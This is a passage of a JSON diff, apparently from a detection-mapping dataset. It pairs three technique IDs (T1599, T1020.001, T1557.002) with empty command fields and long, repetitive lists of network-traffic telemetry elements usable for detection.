"Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1599", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1020.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1557.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": 